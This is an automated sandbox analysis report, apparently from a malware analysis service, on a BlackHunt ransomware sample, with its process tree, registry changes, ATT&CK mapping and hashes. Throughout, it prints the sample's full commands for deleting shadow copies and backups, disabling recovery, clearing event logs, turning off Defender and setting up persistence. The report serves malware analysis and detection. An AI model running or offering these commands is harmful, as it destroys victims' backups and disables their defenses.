1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 195 PID 1220 wrote to memory of 4836 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 195 PID 1220 wrote to memory of 208 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 192 PID 1220 wrote to memory of 208 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 192 PID 1220 wrote to memory of 3408 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 190 PID 1220 wrote to memory of 3408 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 190 PID 1220 wrote to memory of 1644 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 118 PID 1220 wrote to memory of 1644 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 118 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe"C:\Users\Admin\AppData\Local\Temp\38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1220 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵PID:4260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:1784
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:5240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4520
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:8340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1524
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:6716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:3980
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:6360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4672
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:7484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1644
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:6576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe" /F2⤵PID:3236
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe" /F3⤵
- Creates scheduled task(s)
PID:10544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3996
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:7344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:4940
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:4244
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:10452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:5012
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:11888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5140
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5184
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:10468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5252
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:7052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5284
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:10472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5356
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:6424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2908
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1576
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:464
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3408
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:208
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4836
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4324
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3608
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4676
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2916
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1804
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2764
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:3044
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:4980
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:4820
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:4392
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:1628
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:984
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:3396
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:6088
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:4800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:13848
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵PID:1548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:13224
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵PID:13184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:10652
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
PID:9312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:8680
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
PID:7552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:10824
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
PID:13240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:11912
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
PID:1684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:5276
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
PID:14044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:14332
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:11892
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:11156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:13420
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:13548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:11204
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:13584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵
- Enumerates connected drives
PID:10452 -
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:13900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1508
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:8308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:13324
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:14280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:13728
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:6676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:13820
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:6640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:10880
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
PID:13188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:9408
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:8256
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8256 -s 14444⤵
- Program crash
PID:64
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe"2⤵PID:1636
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:14316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:9016
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:8292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:13556
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:6692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:13360
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:1504
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Modifies registry class
PID:4260
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:5040
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:5112
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:7068
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:8288
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:9816
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:7200
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:8592
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:7308
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:8344
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:9644
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:9060
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:8304
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:10852
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:6436
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:6528
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:11936
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6496
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f1⤵PID:6552
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:6556
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:7596
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:8328
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:8412
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1088
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:6436
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:8288
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 8256 -ip 82561⤵PID:13464
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD580a05dd0f8049e82068ea6f6c49717ab
SHA1beb88a37f286ce71fba3b3687adb6ec7633d7a96
SHA2560c86ff706d6792e8d39187e9ba6b071c6a4a7b6f6a4808757cd98063bb7cf8e7
SHA51241ce1bdb16d7c8e96a097ea551610a0d4ef88266afd12c7a13f4a0364ea5e26ac875d420a0e1ae008934653c8047e40a9721ad9b557d5d51010a516c8c481b64
-
Filesize
12KB
MD5930a314879467e4ca3bf7bc7679d661a
SHA1d66ef5e16da651adc23d7ce449e83fd0ee656493
SHA25652f2a5e428ac9d1ab07c24b14f557cc757e1fe04b844efa14ab88047fb21f53d
SHA512c46e0a37ea0639eec5f7f20a7b27924b906a32a9eff1b6dfb82d7dbdfa565bebc231ee5a2221e794cb1fa38eb34e5594b071982cedf930e1c2f5fdefd5f9e62f
-
Filesize
684B
MD56877644c4c4d5438397f4b526407ba70
SHA1d6ebc9552478e63c53085b7fd96800eeb7808447
